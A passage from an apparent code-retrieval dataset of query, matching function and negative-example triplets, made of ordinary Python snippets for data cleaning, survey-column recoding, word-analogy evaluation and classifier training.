"def eval(self):\n\n print()\n multi_question = len(self._analogy_questions) > 1\n global_guessed = 0\n global_total = 0\n for i in range(len(self._analogy_questions)):\n questions = self._analogy_questions[i]\n # How many questions we get right at precision@1.\n correct = {i: 0 for i in xrange(ANALOGY_COUNT)}\n skips_map = {i: 0 for i in xrange(ANALOGY_COUNT + 1)}\n\n try:\n total = questions.shape[0]\n except AttributeError as e:\n raise AttributeError(\"Need to read analogy questions.\")\n\n start = 0\n while start < total:\n limit = start + 2500\n sub = questions[start:limit, :]\n idx = self._predict(sub)\n start = limit\n for question in xrange(sub.shape[0]):\n prio = 0\n skips = 0\n for j in xrange(ANALOGY_COUNT):\n if idx[question, j] == sub[question, 3]:\n # Bingo! We predicted correctly. E.g., [italy, rome, france, paris].\n correct[prio] += 1\n break\n elif idx[question, j] in sub[question, :3]:\n # We need to skip words already in the question.\n skips += 1\n continue\n else:\n # The correct label is not the precision@1\n prio += 1\n skips_map[skips] += 1\n accuracy_list = ' '.join('%5.1f%%' % (correct[i] * 100.0 / total) for i in xrange(ANALOGY_COUNT))\n total_skips = sum(skips_map.values())\n skips_list = ' '.join('%5.1f%%' % (skips_map[i] * 100.0 / total_skips) for i in xrange(1, ANALOGY_COUNT + 1))\n guessed = sum(correct.values())\n suffix = ' for #%d' % (i + 1) if multi_question else ''\n output(\"Eval%s %4d/%d accuracy = %5.1f%% [%s] skips [%s]\" % (\n suffix, guessed, total, guessed * 100.0 / total, accuracy_list, skips_list\n ))\n global_guessed += guessed\n global_total += total\n\n if multi_question:\n output(\"Eval global %4d/%d accuracy = %4.1f%%\" % (\n global_guessed, global_total, global_guessed * 100.0 / global_total\n ))"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
When there is an option for 'Other', the column contains the value typed by the participants. However, to plot later, it is better to recode all this values as for the other items, then duplicating these values in another column with the tags [Other Raw] to keep the information for later. There are two cases when [OTHER] columns have been created. 1. In case of a multiple choice question (several answer can be selected) The value needs to be recoded into 'Yes' and the column kept 2. In case of a drop down type of question (only one answer can be selected) The column can be just renamed into [Other Raw] for later analysis, the value 'Other' being already encoded in the principal column question Creating the tag [Other Raw] at the beginning of the column name to avoid that columns being picked up by the grouping_question()
|
def duplicating_other(self, df):
for col in df.columns:
if col[-7:] == '[Other]':
# Duplicate the column
df['[OTHER_RAW]. '+ col] = df[col]
# Replace all the values with 'Yes'
df[col] = df[col].apply(lambda x: 'Yes' if not pd.isnull(x) else np.nan)
# Droping the column
df = df.drop(col, axis=1)
return df
|
[
"def choice_col(self):\n return 'chosen'",
"def tidy_dic():\n #defining path for data\n fname = os.path.join(data_path, \"gardner_time_to_catastrophe_dic_tidy.csv\")\n\n #read csv\n df = pd.read_csv(fname)\n\n # Since just True or False on a plot legend doesn't make much sense, we'll create a column, \n #```tubulin_labeled```, that converts the ```True``` and ```False``` values from the \n #```labeled``` column to ```'labeled tubulin'``` and ```'microtubules'```\n df['tubulin_labeled'] = [\n 'labeled tubulin' if df.labeled[i] else 'microtubules' \n for i in range(len(df.labeled))\n ]\n return df",
"def label_other(self, event):\n setattr(self, 'user_action', 'Other')\n\n # In this case, promt the user for more information\n ## protect against clicking a button crashing the program by defaulting to Unsure\n try:\n user_comment = input(\"\\nUser Comment: \")\n except RuntimeError:\n user_comment = \"double click\"\n print(\"Please don't double click on the 'Other' button. \"\n \"Image has been labeled as 'Unsure' to prevent crash. \"\n \"Press enter to continue.\")\n print(\"You can use the 'Back' button to redo the image\")\n setattr(self, 'user_action', 'Unsure')\n\n setattr(self, 'user_comment', user_comment)\n\n plt.close()\n return",
"def create_lemmatized_question_answer_column(self):\n log.debug(f'Entering: \"{inspect.currentframe().f_code.co_name}\"')\n self.df['clean_question'] = self.df['Question'].swifter.apply(\n self.clean_sentence,\n args=(True,)\n )\n self.df['clean_answer'] = self.df['Answer'].swifter.apply(\n self.clean_sentence,\n args=(True,)\n )\n log.debug(f'Leaving: \"{inspect.currentframe().f_code.co_name}\"')",
"def pref_type(row):\n if \"Personal\" in row['variable']:\n return \"Personal\"\n elif \"Professional\" in row['variable']:\n return \"Professional\"\n else:\n return \"Industry\"",
"def default_preprocessing(df):\n def race(row):\n if ((row['HISPANX'] == 2) and (row['RACEV2X'] == 1)): #non-Hispanic Whites are marked as WHITE; all others as NON-WHITE\n return 'White'\n return 'Non-White'\n\n df['RACEV2X'] = df.apply(lambda row: race(row), axis=1)\n df = df.rename(columns = {'RACEV2X' : 'RACE'})\n\n df = df[df['PANEL'] == 21]\n\n # RENAME COLUMNS\n df = df.rename(columns = {'FTSTU53X' : 'FTSTU', 'ACTDTY53' : 'ACTDTY', 'HONRDC53' : 'HONRDC', 'RTHLTH53' : 'RTHLTH',\n 'MNHLTH53' : 'MNHLTH', 'CHBRON53' : 'CHBRON', 'JTPAIN53' : 'JTPAIN', 'PREGNT53' : 'PREGNT',\n 'WLKLIM53' : 'WLKLIM', 'ACTLIM53' : 'ACTLIM', 'SOCLIM53' : 'SOCLIM', 'COGLIM53' : 'COGLIM',\n 'EMPST53' : 'EMPST', 'REGION53' : 'REGION', 'MARRY53X' : 'MARRY', 'AGE53X' : 'AGE',\n 'POVCAT16' : 'POVCAT', 'INSCOV16' : 'INSCOV'})\n\n df = df[df['REGION'] >= 0] # remove values -1\n df = df[df['AGE'] >= 0] # remove values -1\n\n df = df[df['MARRY'] >= 0] # remove values -1, -7, -8, -9\n\n df = df[df['ASTHDX'] >= 0] # remove values -1, -7, -8, -9\n\n df = df[(df[['FTSTU','ACTDTY','HONRDC','RTHLTH','MNHLTH','HIBPDX','CHDDX','ANGIDX','EDUCYR','HIDEG',\n 'MIDX','OHRTDX','STRKDX','EMPHDX','CHBRON','CHOLDX','CANCERDX','DIABDX',\n 'JTPAIN','ARTHDX','ARTHTYPE','ASTHDX','ADHDADDX','PREGNT','WLKLIM',\n 'ACTLIM','SOCLIM','COGLIM','DFHEAR42','DFSEE42','ADSMOK42',\n 'PHQ242','EMPST','POVCAT','INSCOV']] >= -1).all(1)] #for all other categorical features, remove values < -1\n\n def utilization(row):\n return row['OBTOTV16'] + row['OPTOTV16'] + row['ERTOT16'] + row['IPNGTD16'] + row['HHTOTD16']\n\n df['TOTEXP16'] = df.apply(lambda row: utilization(row), axis=1)\n lessE = df['TOTEXP16'] < 10.0\n df.loc[lessE,'TOTEXP16'] = 0.0\n moreE = df['TOTEXP16'] >= 10.0\n df.loc[moreE,'TOTEXP16'] = 1.0\n\n df = df.rename(columns = {'TOTEXP16' : 'UTILIZATION'})\n return df",
"def choices(self):\n if self.data_type == YES_NO:\n cs = [(YES_CODE, '%s-Yes' % YES_CODE), (NO_CODE, '%s-No' % NO_CODE)]\n else:\n cs = [(fo.code, \"%s-%s\" % (fo.code.lstrip('0'), fo.description))\n for fo in self.factoption_set.all().order_by('code')]\n cs.insert(0, ('', 'Make a selection'))\n return cs",
"def create_sentence_similarity_column(self, user_question):\n log.debug(f'Entering: \"{inspect.currentframe().f_code.co_name}\"')\n self.df['sim'] = ''\n user_question = self.clean_sentence(user_question)\n self.df['sim'] = self.df['clean_title'].swifter.apply(\n self.sentence_similarity,\n args=(user_question,)\n )\n log.debug(f'Leaving: \"{inspect.currentframe().f_code.co_name}\"')",
"def qualitative_field_type(self):\n\n self.fields_type[self.headerIndex] = 'qualitative'\n item_txt = self.fields[self.headerIndex] + \"\\n\" + self.fields_type[self.headerIndex] + \"\\n\"\n item = QtWidgets.QTableWidgetItem(item_txt)\n self.ui.tableWidget.setHorizontalHeaderItem(self.headerIndex, item)",
"def delimited_from_dichotomous(meta, df, name, sniff_single=False):\n \n if sniff_single and df.shape[1]==1:\n # The set has only 1 possible response\n # Convert to single\n series = df.iloc[:,0].replace(0, np.NaN)\n # Replace data file set item\n old_set_item = 'columns@{}'.format(series.name)\n new_set_item = 'columns@{}'.format(name)\n idx = meta['sets']['data file']['items'].index(old_set_item)\n meta['sets']['data file']['items'].insert(idx, new_set_item)\n meta['sets']['data file']['items'].remove(old_set_item)\n # Rename the series\n series.name = name\n # Update type in meta\n meta['columns'][name]['type'] = 'single'\n return meta, series\n \n elif sniff_single and all([v<=1 for v in df.sum(axis=1)]):\n # The set values are mutually exclusive \n # Convert to single\n df = df.copy()\n # Replace data file set item\n old_set_item = 'columns@{}'.format(df.columns[0])\n new_set_item = 'columns@{}'.format(name)\n idx = meta['sets']['data file']['items'].index(old_set_item)\n meta['sets']['data file']['items'].insert(idx, new_set_item)\n for col in df.columns:\n old_set_item = 'columns@{}'.format(col)\n meta['sets']['data file']['items'].remove(old_set_item)\n # Transform the dataframe\n for v, col in enumerate(df.columns, start=1):\n # Convert to categorical set\n df[v] = df[col].replace(1, v)\n del df[col]\n series = df.sum(axis=1).replace(0, np.NaN)\n # Rename the series\n series.name = name\n # Update type in meta\n meta['columns'][name]['type'] = 'single'\n return meta, series\n \n else:\n series = condense_dichotomous_set(\n df, values_from_labels=True, values_regex='^.+r([0-9]+)[c0-9]*$')\n series.name = name\n # Replace data file set item\n old_set_item = 'columns@{}'.format(df.columns[0])\n new_set_item = 'columns@{}'.format(name)\n idx = meta['sets']['data file']['items'].index(old_set_item)\n meta['sets']['data file']['items'].insert(idx, new_set_item)\n for col in df.columns:\n old_set_item = 'columns@{}'.format(col)\n meta['sets']['data file']['items'].remove(old_set_item)\n \n return meta, series",
"def _standardize_column_values(dataframe):\n\n # TODO Use None instead of \"-\"; but may affect downstream pipelines that use \"-\" already\n if \"structure.alternate_model\" in dataframe.columns:\n dataframe[\"structure.alternate_model\"].replace(\"\", \"-\", inplace=True)\n if \"ligand.expo_id\" in dataframe.columns:\n dataframe[\"ligand.expo_id\"].replace(0, \"-\", inplace=True)\n if \"ligand_allosteric.expo_id\" in dataframe.columns:\n dataframe[\"ligand_allosteric.expo_id\"].replace(0, \"-\", inplace=True)\n if \"structure.resolution\" in dataframe.columns:\n dataframe[\"structure.resolution\"].replace(0, np.nan, inplace=True)\n\n # In case of drugs\n if \"drug.brand_name\" in dataframe.columns:\n dataframe[\"drug.brand_name\"] = dataframe[\"drug.brand_name\"].apply(\n lambda x: x.split(\";\") if x != \"\" else []\n )\n if \"drug.synonyms\" in dataframe.columns:\n dataframe[\"drug.synonyms\"] = dataframe[\"drug.synonyms\"].apply(\n lambda x: x.split(\"\\t\") if x != \"\" else []\n )\n\n return dataframe",
"def condense_dichotomous_set(df, values_from_labels=True, sniff_single=False,\n yes=1, no=0, values_regex=None):\n\n # Convert to delimited set\n df_str = df.astype('str')\n for v, col in enumerate(df_str.columns, start=1):\n if values_from_labels:\n if values_regex is None:\n val = col.split('_')[-1]\n else:\n \n try:\n val = get_delimited_value(col, v, as_str=True)\n except AttributeError:\n raise AttributeError(\n \"Your values_regex may have failed to find a match\"\n \" using re.match('{}', '{}')\".format(\n values_regex, col))\n else:\n val = str(val)\n # Convert to categorical set\n df_str[col].replace(\n {\n 'nan': 'nan', \n '{}.0'.format(no): 'nan',\n '{}'.format(no): 'nan'\n }, \n inplace=True\n )\n df_str[col].replace(\n {\n '{}'.format(yes): val, \n '{}.0'.format(yes): val\n }, \n inplace=True\n )\n # Concatenate the rows\n series = df_str.apply(\n lambda x: ';'.join([\n val \n for val in x.tolist() \n if val != 'nan'\n ]),\n axis=1\n )\n \n # Add trailing delimiter\n series = series + ';'\n \n # Use NaNs to represent emtpy\n series.replace(\n {';': np.NaN}, \n inplace=True\n )\n \n if df.dropna().size==0:\n # No responses are known, return filled with NaN\n return series\n \n if sniff_single and df.sum(axis=1).max()==1:\n # Convert to float\n series = series.str.replace(';','').astype('float')\n return series\n \n return series",
"def annotate_value_or_default(self, option_name): \n\n field_name = '_' + option_name\n default_annotation_name = option_name + '_default'\n\n return (self.annotate_defaults(option_name)\n .annotate(**{option_name: functions.Coalesce(field_name, default_annotation_name)}))",
"async def tasks_other(self, ctx):\n try:\n result = sheet.values().get(spreadsheetId=spreadsheet_id, range=\"Other!A2:I\").execute()\n values = result.get(\"values\", [])\n embed = discord.Embed(title=\"RCS Council Other Items\", color=discord.Color.gold())\n for row in values:\n if len(row) < 9:\n if len(row[6]) > 1:\n assigned_to = f\"Assigned to: {self.guild.get_member(int(row[6])).display_name}\"\n else:\n assigned_to = \"Unassigned\"\n embed.add_field(name=f\"Other Comment from {row[1]}\\n{row[7]}\",\n value=f\"{row[3][:1000]}\\n{assigned_to}\\nDated: {row[0]}\",\n inline=False)\n embed.set_footer(text=\"Use ++tasks done <Task ID> to complete a task\")\n if len(embed.fields) > 0:\n await ctx.send(embed=embed)\n else:\n await ctx.send(\"No tasks in the Other category at this time.\")\n except:\n self.bot.logger.exception(\"++tasks other failed\")",
"def sample_custom_query_5():\n return pd.DataFrame({'X': ['d'], 'Numerical': [25]})",
"def clean_gender(dataframe: pd.DataFrame)-> pd.DataFrame:\n genderDistribution = dataframe.loc[:, dataframe.columns.str.contains('gender|Gender', regex=True)]\n nusers = dataframe.index\n dataframe['Gender'] = genderDistribution.apply(lambda row: ' '.join(row.values.astype(str)), axis=1)\n dataframe.loc[dataframe['Gender'].str.contains(\n 'Trans|them|trans|Undecided|Contextual|transgender|nb|unicorn|Unicorn|queer|NB|binary|Enby|Human|little|androgynous|Androgyne|Neutral|Agender|Androgynous|Androgynous|Fluid|GenderFluid|Genderflux|genderqueer|Genderqueer',\n regex=True), 'Gender'] = 'Undecided'\n dataframe.loc[dataframe['Gender'].str.contains(\n 'Female|female|FEMALE|Woman|woman|w|womail|W|Cis female| Female (cis)|Cis Female|cis female|cis woman|F|f',\n regex=True), 'Gender'] = 'Female'\n cond1 = dataframe['Gender'] != 'Female'\n cond2 = dataframe['Gender'] != 'Undecided'\n dataframe.loc[cond1 & cond2, 'Gender'] = 'Male'\n dataframe.drop(genderDistribution, axis=1, inplace=True)\n dataframe.set_index('User_Id', inplace=True)\n\n return dataframe",
"def merge_participants(self):\n participants = self.sp.selected_text2()\n participants['sentiment'] = participants['positive'] + participants['negative']\n # recoded labels\n labels = self.recode()\n # merge\n par_label = participants.merge(labels, on='textID', how='left')\n # replace nan with 0\n par_label = par_label.fillna(0)\n return par_label",
"def data_kinds():\n # Q,actual amount average makes sense / O, order raking them?/ N, category\n \n dic = {}\n dic = {'YEAR': 'O', \n 'MONTH': 'O',\n 'DAY': 'O',\n 'DAY_OF_WEEK': 'N',\n 'AIRLINE': 'N',\n 'FLIGHT_NUMBER':'N',\n 'TAIL_NUMBER': 'N',\n 'ORIGIN_AIRPORT':'N',\n 'DESTINATION_AIRPORT':'N',\n 'SCHEDULED_DEPARTURE': 'Q',\n 'DEPARTURE_TIME': 'Q',\n 'DEPARTURE_DELAY':'Q',\n 'TAXI_OUT': 'Q',\n 'WHEELS_OFF': 'Q' , \n 'SCHEDULED_TIME': 'Q', \n 'ELAPSED_TIME': 'Q', \n 'AIR_TIME':'Q', \n 'DISTANCE' : 'Q',\n 'WHEELS_ON' : 'Q', \n 'TAXI_IN':'Q',\n 'SCHEDULED_ARRIVAL':'Q', \n 'ARRIVAL_TIME':'Q',\n 'ARRIVAL_DELAY':'Q', \n 'DIVERTED': 'N', \n 'CANCELLED':'N', \n 'CANCELLATION_REASON':'N',\n 'AIR_SYSTEM_DELAY':'Q', \n 'SECURITY_DELAY':'Q', \n 'AIRLINE_DELAY':'Q',\n 'LATE_AIRCRAFT_DELAY':'Q', \n 'WEATHER_DELAY':'Q' \n }\n \n\n return dic",
"def get_original_caption_field(value):\n return u' |other_fields_2 = {{Information field' \\\n u'|name={{original caption/i18n|header}}' \\\n u'|value=%s}}\\n' % value",
"def modify_phenos_mt(result_type):\n mt = hl.read_matrix_table(\n f\"{bucket}/{CURRENT_TRANCHE}/results/{'' if result_type=='gene' else 'variant_'}results.mt\"\n )\n mt = drop_pheno_fields_mt(mt)\n mt = mt.filter_cols(\n (mt.n_cases_defined >= 100)\n & ~((mt.phenocode == \"20004\") & ((mt.coding == \"1490\") | (mt.coding == \"1540\")))\n & ~((mt.phenocode == \"Allergy_pfe\") | (mt.phenocode == \"AnyAutoimmune_pfe\"))\n )\n mt = mt.annotate_cols(\n description=hl.case()\n .when(mt.description.matches(\"AbbVie\"), mt.description.replace(\"AbbVie \", \"\"))\n .when(mt.description.matches(\"pfe\"), mt.description.replace(\" \\(pfe\\)\", \"\"))\n .default(mt.description)\n )\n mt = mt.annotate_cols(\n description=hl.if_else(\n mt.phenocode.startswith(\"WBFMadjBMI_\")\n | mt.phenocode.startswith(\"WBfatmass_\"),\n mt.description.replace(\"fat\", \"fat free\"),\n mt.description,\n ),\n description_more=hl.if_else(\n mt.phenocode.startswith(\"WBFMadjBMI_\")\n | mt.phenocode.startswith(\"WBfatmass_\"),\n mt.description_more.replace(\"mass\", \"free mass\"),\n mt.description_more,\n ),\n )\n mt = mt.annotate_cols(\n description=hl.if_else(\n mt.description.matches(\"WBFMadjBMI\"),\n mt.description.replace(\"WBFMadjBMI\", \"WBFFMadjBMI\"),\n mt.description,\n )\n )\n\n import random\n\n random.seed(2022)\n alz_order = [1, 2]\n random.shuffle(alz_order)\n ibd_order = [1, 2]\n random.shuffle(ibd_order)\n\n mt = mt.key_cols_by(\n phenocode=hl.case()\n .when(mt.phenocode == \"AbbVie_Alzheimers\", f\"Alzheimers_custom{alz_order[0]}\")\n .when(mt.phenocode == \"Alzheimers_BI\", f\"Alzheimers_custom{alz_order[1]}\")\n .when(mt.phenocode == \"AbbVie_IBD\", f\"IBD_custom{ibd_order[0]}\")\n .when(mt.phenocode == \"IBD_pfe\", f\"IBD_custom{ibd_order[1]}\")\n .when(\n mt.phenocode.startswith(\"AbbVie_\"),\n mt.phenocode.replace(\"AbbVie_\", \"\") + \"_custom\",\n )\n .when(mt.phenocode.endswith(\"_pfe\"), mt.phenocode.replace(\"_pfe\", \"_custom\"))\n .when(mt.phenocode.endswith(\"_BI\"), mt.phenocode.replace(\"_BI\", \"_custom\"))\n .default(mt.phenocode),\n )\n mt = mt.key_cols_by(\n trait_type=mt.trait_type,\n phenocode=hl.case()\n .when(\n mt.phenocode.startswith(\"WBFMadjBMI_\"),\n mt.phenocode.replace(\"WBFMadjBMI_\", \"WBFFMadjBMI_\"),\n )\n .when(\n mt.phenocode.startswith(\"WBfatmass_\"),\n mt.phenocode.replace(\"WBfatmass_\", \"WBfatfreemass_\"),\n )\n .default(mt.phenocode),\n pheno_sex=mt.pheno_sex,\n coding=mt.coding,\n modifier=hl.if_else(\n hl.set({\"biogen\", \"abbvie\", \"pfizer\"}).contains(mt.modifier),\n \"custom\",\n mt.modifier,\n ),\n )\n return mt"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Stores training points x_train and their correponsindg labels w_train, and estimates the a prior probabilities p(w_i) for each class w_i.
|
def fit(self, x_train, w_train):
# Store examples.
self.x_train = x_train
self.w_train = w_train
# Estimate a prior probabilities p(wi) for each class wi.
self.p_w = DataLoader.compute_a_priori(w_train)
self.num_classes = len(self.p_w)
return self
|
[
"def learn(self, Xtrain, ytrain):\n\n ### YOUR CODE HERE\n if self.params['usecolumnones']:\n self.numfeatures = Xtrain.shape[1]\n \n else:\n self.numfeatures = Xtrain.shape[1] - 1\n\n ### END YOUR CODE\n\n origin_shape = (self.numclasses, self.numfeatures)\n self.means = np.zeros(origin_shape)\n self.stds = np.zeros(origin_shape)\n self.prior_prob = np.zeros(2)\n \n\n ### YOUR CODE HERE\n for clas in range(self.numclasses):\n indices = np.where(ytrain == clas)\n trainclass = Xtrain[indices]\n ## calculating prior probability for each class\n self.prior_prob[clas] = np.size(indices)/(float)(Xtrain.shape[0])\n #print(np.size(indices))\n for i in range(self.numfeatures):\n self.means[clas, i] = np.mean(trainclass[:, i])\n self.stds[clas, i] = np.std(trainclass[:, i])\n \n ### END YOUR CODE\n\n assert self.means.shape == origin_shape\n assert self.stds.shape == origin_shape",
"def train_sequential(self, verbose):\n iteration = 0\n self.int_w = {}\n self.error_history = []\n # take a random batch or sequential batch?\n data = self.train_data\n targets = self.train_targets\n self.predictions = np.empty(len(targets))\n while iteration < self.epochs:\n\n for nd, d in enumerate(data):\n #predict (compute product of X * w)\n self.sum = np.dot(d, self.w) # Y_pred: NxNeurons \"the output will be an NxNeurons matrix of sum for each neuron for each input vector\"\n # compute delta_w\n delta_w = self.learn(d, targets[nd], num_data = nd)\n #update\n self.w = self.w - delta_w.reshape(-1,1)\n\n # compute error\n self.sum = np.dot(data, self.w)\n self.predictions = self.activation_function()\n if self.learning_method == 'perceptron':\n self.error = self.missclass_error(self.predictions, targets)\n else:\n self.error = np.mean((self.sum - targets) ** 2) # mse\n\n self.error_history.append(self.error)\n if self.error <= self.epsilon:\n if (verbose):\n self.print_info(iteration, self.error)\n break\n\n self.int_w[iteration] = self.w\n\n if (verbose):\n self.print_info(iteration, self.error)\n iteration += 1",
"def train(self, training_data: np.ndarray, training_labels: np.ndarray) -> None:\n # before training, make sure the prior list and likelihoods list is empty\n self.__log_class_priors = []\n self.__log_class_conditional_likelihoods = []\n\n if not (training_data is None or training_labels is None):\n self.__estimate_log_class_priors(training_labels)\n self.__estimate_log_class_conditional_likelihoods(training_data, training_labels)",
"def update(self, examples):\n\n batch_X, batch_y = get_prodigy_x_y(examples, self.cat2bin)\n\n if len(batch_X) != 0:\n # Update if the \n self.training_X = self.training_X + batch_X\n self.training_y = self.training_y + batch_y\n\n # Refit with collated old training data with new\n self.vectorizer = TfidfVectorizer(\n analyzer='word',\n token_pattern=r'(?u)\\b\\w+\\b',\n ngram_range=(1, 2)\n )\n train_X_vect = self.vectorizer.fit_transform(self.training_X)\n \n self.model = LogisticRegression(max_iter=1000)\n self.model = self.model.fit(train_X_vect, self.training_y)\n\n new_y_pred = self.model.predict(train_X_vect)\n test_y_pred = self.model.predict(self.vectorizer.transform(self.test_X))\n\n train_f1 = f1_score(self.training_y, new_y_pred, average='weighted')\n self.test_f1 = f1_score(self.test_y, test_y_pred, average='weighted')\n print(f\"Training F1: {round(train_f1, 3)}\")\n print(f\"Test F1: {round(self.test_f1, 3)}\")\n print(\"Train classification report:\")\n print(classification_report(self.training_y, new_y_pred))\n print(\"Test classification report:\")\n print(classification_report(self.test_y, test_y_pred))\n print(\"Test confusion:\")\n print(confusion_matrix(self.test_y, test_y_pred))",
"def train(self, images, labels, load):\n \n PATH='./trained.pickle'\n\n if os.path.isfile(PATH) and load:\n print 'Loading already existing training values from ' + PATH\n with open('trained.pickle') as f:\n self.classes, self.prClass, self.prPixelGivenClass = pickle.load(f)\n else:\n self.prClass = [0 for i in range(10)]\n self.classes = [i for i in range(10)]\n self.prPixelGivenClass = [[0 for i in range(14*14)] for j in range(10)]\n \n for i in range(len(labels)):\n self.prClass[labels[i]] += 1 # Count how many times a class appears in the labels list.\n for j in range(len(images[i])):\n if images[i][j] < 100:\n self.prPixelGivenClass[labels[i]][j] += 1 # For every class, count how many times\n # a pixel is black.\n \n for i in range(len(self.prPixelGivenClass)):\n for j in range(len(self.prPixelGivenClass[i])):\n self.prPixelGivenClass[i][j] /= float(self.prClass[i]) # Divide the count of black pixels\n # by the number of times a class\n # appears, to get a percentage.\n self.prClass[i] /= float(len(images)) # Divide the number of times a class\n # appears, by the total number of classes\n # to get a percentage.\n \n print ''\n for i in range(len(self.prClass)): # some useful output that shows the probability of each class.\n print 'Pr(C=' + str(i) + ') = ' + str(self.prClass[i])[:5]\n # print 'Probabilites of the individual pixel in this class:' \"\"Commented because we now have\n # self.print_ascii_probabilities(self.prPixelGivenClass[i]) \"\"'heat-maps' for each image\n # print''\n print ''\n with open('trained.pickle', 'w') as f:\n pickle.dump([self.classes, self.prClass, self.prPixelGivenClass], f)",
"def train(self):\r\n hidden_size, output_size, num_epochs = self.params[\"h_size\"], \\\r\n self.params[\"o_size\"], self.params[\"num_epochs\"]\r\n \r\n # initialize weights to small random numbers, biases to 0\r\n w1 = np.random.randn(hidden_size, self.X.shape[1])\r\n b1 = np.zeros((hidden_size, 1))\r\n w2 = np.random.randn(output_size, hidden_size)\r\n b2 = np.zeros((output_size, 1))\r\n \r\n for i in range(0, num_epochs):\r\n # do a backprop update\r\n cost, w1, b1, w2, b2 = self.backprop(w1, b1, w2, b2)\r\n \r\n # epoch check and print current cost\r\n if (i % 1 == 0):\r\n print(\"Epoch \", i, \"cost: \", cost)\r\n \r\n self.model = { 'W1': w1, 'b1': b1, 'W2': w2, 'b2': b2}",
"def train(self, X, d):\n for _ in range(self.epochs):\n for i in range(d.shape[0]):\n y = self.predict(X[i])\n e = d[i] - y\n self.W = self.W + self.lr * e * np.insert(X[i], 0, 1)",
"def cnn_predict():\n\n x_test, y_test, file_name_test_list = load_test_set()\n\n model = cnn()\n\n weight_path = Path(config[\"weight_file\"])\n if weight_path.exists() is False:\n log.error(\"Not found weight file %s. Aborting.\" % (weight_path))\n sys.exit(1)\n\n model.load_weights(weight_path)\n\n y_predicted = model.predict(x_test)\n correct_count = 0\n total_count = x_test.shape[0]\n for i in range(total_count):\n # Ground truth\n # Convert the file name to a string that contains only the ground trugh classes\n name = file_name_test_list[i]\n underscore_pos = name.find(\"_\")\n if underscore_pos < 0:\n log.warning(\"Invalid image file name. Missing classification marker for file %s\" % (name))\n continue\n\n classes = name[0:underscore_pos]\n actual = \"\"\n if DogClassMarker.AIMEE in classes:\n actual = actual + DogClassMarker.AIMEE\n if DogClassMarker.MADDIE in classes:\n actual = actual + DogClassMarker.MADDIE\n if DogClassMarker.OLIVIA in classes:\n actual = actual + DogClassMarker.OLIVIA\n if DogClassMarker.PINK in classes:\n actual = actual + DogClassMarker.PINK\n if len(actual) == 0:\n actual = \"_\"\n\n # Prediction\n # Convert the predicted classes contained in the vector to a string.\n # Before conversion, round down or round up values to 0 or 1 except for the mid-range number.\n # A mid-range number is counted as a \"mismatch\".\n v = y_predicted[i]\n\n low_threshold_flag = v < 0.3\n v[low_threshold_flag] = 0\n\n high_threshold_flag = v > 0.7\n v[high_threshold_flag] = 1\n\n predicted = \"\"\n if v[DogClassIndex.AIMEE] == 1:\n predicted = predicted + DogClassMarker.AIMEE\n if v[DogClassIndex.MADDIE] == 1:\n predicted = predicted + DogClassMarker.MADDIE\n if v[DogClassIndex.OLIVIA] == 1:\n predicted = predicted + DogClassMarker.OLIVIA\n if v[DogClassIndex.PINK] == 1:\n predicted = predicted + DogClassMarker.PINK\n if len(predicted) == 0:\n predicted = \"_\"\n\n # Compare the ground-truth classification string and the predicted classification string\n # Count only the complete match as the match. Do not count the partial match.\n if actual == predicted:\n correct_count = correct_count + 1\n\n print(\"Total count: %d\" % (total_count))\n print(\"Correct count (complete match only): %d\" % (correct_count))\n print(\"Accuracy: %f percent\" % (correct_count * 100 / total_count))",
"def _train_all(names, classifiers,\r\n X, y, X_train, X_test, y_train, y_test,\r\n stats=True, predict=\"\"):\r\n ## ignore numpy warnings\r\n from warnings import filterwarnings\r\n filterwarnings('ignore')\r\n ## cycle around each classifier\r\n classes = {1:\"LIKELY\", -1:\"UNLIKELY\"}\r\n score = {1:0, -1:0}\r\n trusts = {}\r\n predictions = {}\r\n for name, classifier in zip(names, classifiers):\r\n ## train each classifier\r\n classifier.fit(X_train, y_train)\r\n if stats == True:\r\n _get_statistics(name, classifier, X, y, X_test, y_test)\r\n if predict != \"\":\r\n ## Make prediction\r\n prediction = classifier.predict(predict)[0]\r\n\r\n ## Increment counter for relevant score\r\n score[prediction] += 1\r\n predictions.update({name:prediction})\r\n \"\"\"\r\n reveal expected true negatives, false positives,\r\n false negatives, true positives\r\n \"\"\"\r\n tn, fp, fn, tp = c_m(y_test, classifier.predict(X_test)).ravel()\r\n ## trust is the amount of time that the prediction was correct\r\n trust_score = tp/(tp + fp) if prediction == 1 else tn/(tn + fn)\r\n trust_score = round((trust_score * 100), 2)\r\n trusts.update({name:trust_score})\r\n if predict != \"\":\r\n scores = pd.DataFrame({'Recurrence':predictions,\r\n 'Confidence':trusts})\r\n pred_weight = scores.Recurrence * scores.Confidence\r\n weights = pd.DataFrame({'Weights':pred_weight})\r\n scores['Recurrence'] = scores['Recurrence'].apply(lambda x: classes[x])\r\n print(scores)\r\n classification = 1 if weights.Weights.mean() > 0 else -1\r\n print(f\"\\nRecurrence judged {classes[classification]} at \\\r\n{round(abs(weights.Weights.mean()),2)} % confidence\")\r\n print(f\"Poll of classifiers results:\")\r\n for index in score:print(f\"{classes[index]}: \\t\\t{score[index]}\")",
"def train(self, train_data, labels, num_epochs, learning_rate):\n\n # initialize Perceptron instance variables, generate random numbers for weights and bias\n self.performance = []\n self.learning_rate = learning_rate\n self.W = [random.uniform(-1, 1) for i in range(train_data.shape[1] + 1)]\n\n epoch = 0\n if num_epochs < 0:\n raise ValueError(\"number of epochs must be non-negative\")\n\n while True:\n errors = self.train_epoch(train_data, labels, epoch)\n if num_epochs == 0 and errors == 0:\n break\n if num_epochs != 0 and epoch >= num_epochs:\n break\n epoch += 1\n\n return self.performance",
"def train( self, trainingData, trainingLabels):\n\n self.features = trainingData[0].keys()\n \"*** YOUR CODE HERE ***\"\n m = len(trainingData)\n n = int(self.ratio*m)\n trainingDataset = []\n trainingLabelsDataset = []\n\n for i in range(self.num_classifiers):\n trainingDataset.append([])\n trainingLabelsDataset.append([])\n for j in range(n):\n choice = random.choice(range(m))\n trainingDataset[i].append(trainingData[choice])\n trainingLabelsDataset[i].append(trainingLabels[choice])\n\n for i in range(self.num_classifiers):\n self.classifiers[i].train(trainingDataset[i], trainingLabelsDataset[i])\n # util.raiseNotDefined()",
